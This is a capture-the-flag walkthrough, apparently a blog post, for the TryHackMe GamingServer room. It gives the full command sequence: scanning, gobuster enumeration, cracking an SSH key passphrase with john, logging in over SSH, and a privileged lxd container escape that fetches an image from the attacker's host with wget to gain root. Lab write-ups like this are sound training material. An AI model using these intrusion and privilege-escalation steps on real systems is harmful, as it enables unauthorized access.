Writeup of the room GamingServer in TryHackMe.
First start by doing a port scan:
rustscan $IP
Results:
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
Then start start dirbuster or gobuster to search for hidden files:
gobuster dir -u $IP -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
If we head over to the about page at: http://$IP/about.html we can seen an uploads button which takes us to: http://$IP/uploads. The uploads directory has also been defined as disallowed in robots.tx
The uploads directory:
"/uploads"
the dict.lst file appears to be a list of password and possibly even usernames. After a quick look at the file I added a few of my own lines. Some of the entries in this file are ones such as Summer2017 and winter2016. I created these again going from 2018-2020 using all seasons of the year and added entries with the first letter capitalized and uncapitalized.
The character in the meme.jpg file is Beaker from the Muppets so I added the name to the password file and may even use it as a username going forwards.
The manifesto does not contain much interesting information but does have an author name in it which we can use as a possible name. The manifesto could possibly mean the server has already been compromised? I added the author name to the password file just incase.
That contains a ssh key, download it, after you downloaded that key create a new hash file using ssh2john and do the following command: "chmod 600 SecretKey":
python ssh2john.py SecretKey > id_rsa.hash
And then crack it using john and rockyou wordlist:
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Results:
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
letmein (id_rsa)
1g 0:00:00:12 DONE (2020-08-30 22:24) 0.08278g/s 1187Kp/s 1187Kc/s 1187KC/s *7¡Vamos!
Session completed
Then i found a user that can be used for a ssh connection on the website source code in the bottom line of : https://$IP/index.html
As you can see there is a user called john connect to the server throught ssh
ssh john@$IP -i ./SecretKey
Enter the passphrase and you logged in as john
Now get the user flag
cat user.txt
a****************e
After searching and looking in the machine i found an interesting service called lxd(Linux Containers) owned by root and that can be used by anyone, locally clone that repo and run the other commands
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
Then start a simple web server
python -m SimpleHTTPServer
Then download the files you just downloaded locally
cd /tmp
wget http://$LHOST:8000/alpine-v3.12-x86_64-20200830_2354.tar.gz
Replace $LHOST with your local ip address (run “ip addr” to see it) import the image by running:
lxc image import ./alpine-v3.12-x86_64-20200830_2354.tar.gz --alias myimage
Then spawn a root shell by running this list of commands
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignitelxc exec ignite /bin/shwhoami
Now get the root flag
cat mnt/root/root/flag.txt
2************c
Post a Comment
Comments here, cracks!